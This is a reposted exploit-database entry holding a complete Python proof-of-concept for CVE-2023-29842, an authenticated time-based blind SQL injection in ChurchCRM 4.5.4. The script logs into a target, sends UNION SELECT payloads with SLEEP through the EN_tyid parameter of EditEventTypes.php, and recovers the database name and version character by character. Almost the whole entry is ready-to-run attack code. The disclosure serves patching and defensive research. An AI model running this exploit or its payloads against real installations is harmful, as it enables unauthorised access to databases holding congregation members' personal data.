ChurchCRM 4.5.4 SQL Injection
2023-10-17 04:58:18 Author: cxsecurity.com(查看原文) 阅读量:12 收藏

ChurchCRM 4.5.4 SQL Injection

# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid # Date: 03-05-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md # Software Link: https://github.com/ChurchCRM/CRM/releases # Vendor Homepage: http://churchcrm.io/ # Version: 4.5.4 # Tested on: Windows, Linux # CVE: CVE-2023-29842 """ The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter. This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. This script is created as Proof of Concept to retrieve the database name and version. """ import sys, requests def injection(target, inj_str, session_cookies): for j in range(32, 126): url = "%s/EditEventTypes.php" % (target) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j))) r = requests.post(url, headers=headers, data=data) res = r.text if (r.elapsed.total_seconds () > 2 ): return j return None def retrieveDBName(session_cookies): db_name = "" print("(+) Retrieving database name, please wait") for i in range (1,100): injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): sys.stdout.write(chr(retrieved_value)) sys.stdout.flush() else: break def retrieveDBVersion(session_cookies): db_version = "" print("(+) Retrieving database version, please wait") for i in range (1,100): injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): sys.stdout.write(chr(retrieved_value)) sys.stdout.flush() else: break def login(target, username, password): target = "%s/session/begin" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "User=%s&Password=%s" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") retrieveDBName(session_cookies) print("") retrieveDBVersion(session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main()



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2023100038
如有侵权请联系:admin#unsafe.sh